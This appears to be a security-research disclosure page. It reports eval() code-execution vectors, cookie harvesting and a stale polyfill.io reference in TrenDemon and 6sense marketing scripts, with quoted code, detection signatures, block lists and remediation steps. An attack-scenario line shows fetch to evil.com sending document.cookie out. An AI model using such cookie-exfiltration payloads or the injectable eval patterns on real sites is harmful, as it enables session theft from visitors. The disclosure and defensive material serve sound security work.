ZEROSENSE+DEMONSCRIPTThe TrenDemon Zero-Day Stack
We found five zero-day vulnerabilities in the B2B marketing stack by visiting a privacy policy page with a HAR recorder. We were deanonymized while the page loaded from a compromised supply chain.
"I just got deanonymized reading a privacy policy-while the page loaded code from a CDN compromised by a Chinese acquisition 18 months ago."
- Discovery moment, 2025-12-04
ZERO_DAY_REGISTRY
ZeroSense
CRITICALBTI-2025-0023-A
6sense beacon re-transmits ENTIRE Epsilon deanonymization response (phone, address) to ALL 6sense customers via cached q.metadata.ores parameter. Visitors permanently deanonymized for 760 days.
DemonScript
CRITICALBTI-2025-0025-A
Any TrenDemon customer can execute arbitrary JavaScript in visitor browsers via CTA configuration. 6 distinct eval() vectors in trends.min.js.
RollCredits
CRITICALBTI-2025-0025-B
Video players (Wistia, Brightcove, Vidyard) weaponized as execution triggers. Video completion events fire eval(postCompletionScript). Marketing funnel = kill chain.
MaCook'd
HIGHBTI-2025-0025-C
TrenDemon harvests Marketo _mkto_trk cookie via btoa(this.context.maCookie), exfiltrates to trackingapi.trendemon.com on form submission.
PollyWannaCrack
CRITICALBTI-2025-0025-D
TrenDemon SDK still references polyfill.io - domain compromised by Funnull CDN in June 2024. Older browsers (IE11, Safari <9) load malware. Function misspelled as 'loadPollyills'.
DEMONSCRIPT // EVAL() ARBITRARY CODE EXECUTION
Any Customer Can Run Code on Your Visitors
TrenDemon's SDK contains 6 distinct eval() code execution vectors. Any TrenDemon customer (or attacker with CTA access) can execute arbitrary JavaScript in visitor browsers through their dashboard configuration.
ATTACK SCENARIO: Create TrenDemon account → Configure CTA withfetch('https://evil.com/'+document.cookie) → Deploy on target site → Every visitor clicking CTA executes attacker code.
$Trd_Utils.sendGa4Tracking = function(ctaParams, event, page) {
var trackingCodeToEval;
switch(event) {
case "load":
trackingCodeToEval = ctaParams.CustomImpressionTrackingCode;
break;
case "click":
trackingCodeToEval = ctaParams.CustomClickTrackingCode;
break;
}
return (null == trackingCodeToEval ? void 0 : trackingCodeToEval.length)
? eval(trackingCodeToEval) // <-- ARBITRARY CODE EXECUTION
: dataLayer.push({...})
}POLLYWANNACRACK // POLYFILL.IO SUPPLY CHAIN
t.prototype.loadPollyills = function (t) { // Note: MISSPELLED
if (Array.prototype.findIndex) t(); // Modern browser - skip
else {
var e = document.createElement("script");
e.src = "https://polyfill.io/v3/polyfill.min.js?features=...";
// LOADS FROM COMPROMISED DOMAIN ON OLDER BROWSERS
}
};Compromised Supply Chain, Misspelled Function
In June 2024, polyfill.io was acquired by Funnull CDN and began injecting malware into 100,000+ websites. TrenDemon's production code STILL references the compromised domain 18 months later.
Fires when Array.prototype.findIndex unavailable (IE11, Safari <9, older mobile browsers)
Function misspelled as loadPollyills instead ofloadPolyfills. This code hasn't been reviewed since it was written.
ZEROSENSE // CROSS-CUSTOMER PII CACHE
Your Phone Number, Cached for 760 Days
6sense beacon re-transmits the ENTIRE Epsilon deanonymization response(including phone, address) in the q.metadata.ores parameter. Any site running 6sense can retrieve this cached PII.
Once 6sense deanonymizes you on ANY website, your company info (phone, address, company name) is cached and available to ALL 6sense customers for 760 dayswithout hitting the Epsilon data broker again.
// HAR line 74639 - Beacon re-exfiltrates ENTIRE Epsilon response
GET /v1/beacon/img.gif?
q.metadata.ores={"company":"Ronin","phone":"[REDACTED]","address":"[REDACTED]"}
&6suuid=0868dc17054b1100573f016922000000304d0200
&company_id=24deccd977193c4
// ANY 6sense customer can retrieve this cached PII for 760 daysROLLCREDITS // VIDEO COMPLETION = CODE EXECUTION
The Marketing Funnel IS the Kill Chain
Video players (Wistia, Brightcove, Vidyard) aren't just tracking engagement. They're execution triggers. When the video ends and the credits roll, eval(postCompletionScript) fires.
1. Video Loads
Wistia/Brightcove/Vidyard script injected via innerHTML. Visitor identity already captured.
2. User Watches
Maximum engagement achieved. User has invested time, trust at peak. Perfect social engineering moment.
3. Credits Roll
eval(postCompletionScript) executes. Video player was just a fancy setTimeout().
// Video completion triggers arbitrary code execution
if (this.model.videoScript && this.model.videoScript.length) {
var _ = document.createElement("dummy");
_.innerHTML = this.model.videoScript; // DOM injection
Array.from(_.querySelectorAll("script"))
.filter(function (t) { return t.src; })
.forEach(function (t) {
$Trd_Utils.isVideoScriptSourceValid(t.src) && // Wistia/Brightcove/Vidyard
$Trd_Utils.loadJs(t.src, new Date().getTime().toString());
});
}
// On video completion:
(_a.length) && eval(personal.postCompletionScript) // RCEMACOOK'D // MARKETO COOKIE HARVESTING
Your Marketo Cookie, Base64'd and Gone
TrenDemon harvests Marketo's _mkto_trk cookie, Base64-encodes it as maCook, and exfiltrates it to trackingapi.trendemon.com on every form submission.
id:958-TTM-744&token:_mch-6sense.com-33fe35d4df8d6e33441925452a7b0e80Cross-vendor cookie sharing without consent. Links Marketo identity to TrenDemon visitor graph.
// Line 4994-5003 - Marketo cookie exfiltration
this.context.maCookie &&
(p.maCook = btoa(this.context.maCookie)); // Base64 encode stolen cookie
var g = "/api/experience/new-lead?" + params;
$Trd_Tools.JSONP(g, ...) // Exfiltrate to TrenDemonDETECTION_SIGNATURES
# TrenDemon (CRITICAL) ||trackingapi.trendemon.com^ ||assets.trendemon.com^ ||trendemon.com^ # 6sense (CRITICAL) ||6sc.co^ ||eps.6sc.co^ ||b.6sc.co^ # polyfill.io (COMPROMISED) ||polyfill.io^
# TrenDemon SDK "$Trd_Utils" "$Trd_Tools" "sendGa4Tracking" "CustomClickTrackingCode" "loadPollyills" // MISSPELLED "postCompletionScript" # Dangerous patterns eval(trackingCodeToEval) eval(actionScript) eval(personal.postCompletionScript)
REMEDIATION_PLAYBOOK
Website Owners
IMMEDIATE ACTION
1. Remove TrenDemon
Delete all TrenDemon script tags from your site. Check GTM containers.
2. Block at CDN/WAF
Add *.trendemon.com and polyfill.io to blocklist.
3. Audit 6sense Integration
Review what subprocessors 6sense deploys on your domain.
4. Review Marketo Cookies
Check if trd_ma_cookie exists. If so, your Marketo data was harvested.
5. Notify Legal/DPO
760-day cookies violate GDPR. Cross-vendor data sharing requires disclosure.
Security Teams
DETECTION & MONITORING
1. SIEM Rule: eval() in Marketing Tags
Alert on eval( calls from known marketing domains in CSP reports.
2. Network Monitor: TrenDemon API
Watch for trackingapi.trendemon.com outbound connections.
3. CSP Header Update
Remove 'unsafe-eval'. Block *.trendemon.com in script-src.
4. HAR Analysis
Capture HAR on your marketing pages. Search for $Trd_Utils or loadPollyills.
5. Supply Chain Audit
Grep all vendor scripts for polyfill.io references. Replace with cdnjs.
Site Visitors
PERSONAL PROTECTION
1. Install uBlock Origin
Add custom filter: ||trendemon.com^
2. Clear TrenDemon Cookies
Delete all cookies matching trd_* pattern.
3. Clear localStorage
Remove trd_vid_l and trd_vuid_l keys.
4. Block 6sense Domains
Add *.6sc.co to your blocklist to prevent deanonymization.
5. Use Modern Browser
polyfill.io only fires on IE11/Safari <9. Modern browsers skip the compromised CDN.
Quick Remediation Commands
# uBlock Origin Custom Filters
||trendemon.com^ ||trackingapi.trendemon.com^ ||assets.trendemon.com^ ||6sc.co^ ||polyfill.io^
# Browser Console - Clear TrenDemon Data
// Clear cookies
document.cookie.split(";").forEach(c => {
if (c.trim().startsWith("trd_"))
document.cookie = c.split("=")[0] +
"=;expires=Thu, 01 Jan 1970";
});
// Clear localStorage
Object.keys(localStorage)
.filter(k => k.startsWith("trd_"))
.forEach(k => localStorage.removeItem(k));Five Zero-Days. One HAR File.
This is what we found by reading their privacy policy. Imagine what's running on YOUR site.